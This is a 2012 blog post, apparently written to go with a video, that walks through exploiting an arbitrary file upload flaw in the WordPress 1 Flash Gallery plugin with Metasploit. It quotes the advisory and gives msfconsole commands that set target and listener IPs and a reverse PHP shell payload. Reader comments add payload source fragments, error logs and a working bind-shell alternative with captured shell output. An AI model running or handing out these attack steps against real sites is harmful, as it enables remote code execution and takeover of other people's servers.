Friday, 1 June 2012

WordPress 1 Flash Gallery Plugin Arbitrary File Upload Vulnerability




WordPress 1 Flash Gallery Plugin Arbitrary File Upload Vulnerability
Secunia Advisory SA45930
Release Date 2011-09-08
The vulnerability is caused due to the wp-content/plugins/1-flash-gallery/upload.php script (when "action" is set to "uploadify" and "fileext" is set to e.g. "php") improperly verifying uploaded files. This can be exploited to execute arbitrary PHP code by uploading a PHP file. The vulnerability is confirmed in version 1.5.6. Prior versions may also be affected.

Download the exploit from http://www.exploit-db.com/exploits/17801/
Copy to /pentest/exploits/framework3/modules/exploits/multi/http

Fix the payload /pentest/exploits/framework3/modules/payloads/singles/php/reverse_php.rb as I explained on my video.

msfconsole
use multi/http/flash_galery_wordpress
set RHOST 172.16.1.70
set URI /wordpress
set PAYLOAD php/reverse_php_airwolf
set LHOST 172.16.1.79
exploit

And that's it, thank you guys for watching it.

8 comments:

  1. hi bro airwolf reverse shell public?
    senme plz link

    ReplyDelete
  2. airwolf_reverse shell link plz bro

    ReplyDelete
  3. I'm trying to start exploit but it output the next error

    msf exploit(flash_galery_wordpress) > exploit

    [*] Started reverse handler on 192.168.1.3:4444
    [*] Successfully uploaded shell.
    [*] Trying to access shell at ...
    [-] Exploit exception: can't convert nil into String
    [*] Exploit completed, but no session was created.
    msf exploit(flash_galery_wordpress) >

    Please tell me whats wrong?

    ReplyDelete
  4. What is the payload you are trying to use?

    ReplyDelete
  5. hi Angelo one question.

    You was modify the payloads reverse_php.rb in /../payloads/singles/php but you was copy/paste in this file the exploit in this line

    shell=<<-END_OF_PHP_CODE

    END_OF_PHP_CODE


    but the modified code is different from what I see...

    i show you my code

    def php_reverse_shell

    if (!datastore['LHOST'] or datastore['LHOST'].empty?)
    # datastore is empty on msfconsole startup
    ipaddr = '127.0.0.1'
    port = 4444
    else
    ipaddr = datastore['LHOST']
    port = datastore['LPORT']
    end
    exec_funcname = Rex::Text.rand_text_alpha(rand(10)+5)

    uri = "tcp://#{ipaddr}"
    socket_family = "AF_INET"

    if Rex::Socket.is_ipv6?(ipaddr)
    uri = "tcp://[#{ipaddr}]"
    socket_family = "AF_INET6"
    end

    shell=<<-END_OF_PHP_CODE

    -----------------o----------------

    your code does not show this in the beginning
    show us your code
    thx

    ReplyDelete
  6. Metasploit upgraded those payloads, but they still don't work.
    I just tested now and you can use this payload php/meterpreter/bind_tcp
    Once you get your meterpreter session just type "shell" then hit enter, you will get your shell.

    EX:
    meterpreter > shell
    Process 15882 created.
    Channel 0 created.

    id
    uid=48(apache) gid=48(apache) groups=48(apache)
    ls
    20111011082340.php

    ReplyDelete
  7. the flash gallery is nice
    as you are dealing in hacking you must see this too...
    http://born2hack.hpage.com/top-10-ethical-hackers-of-india_18213017.html

    ReplyDelete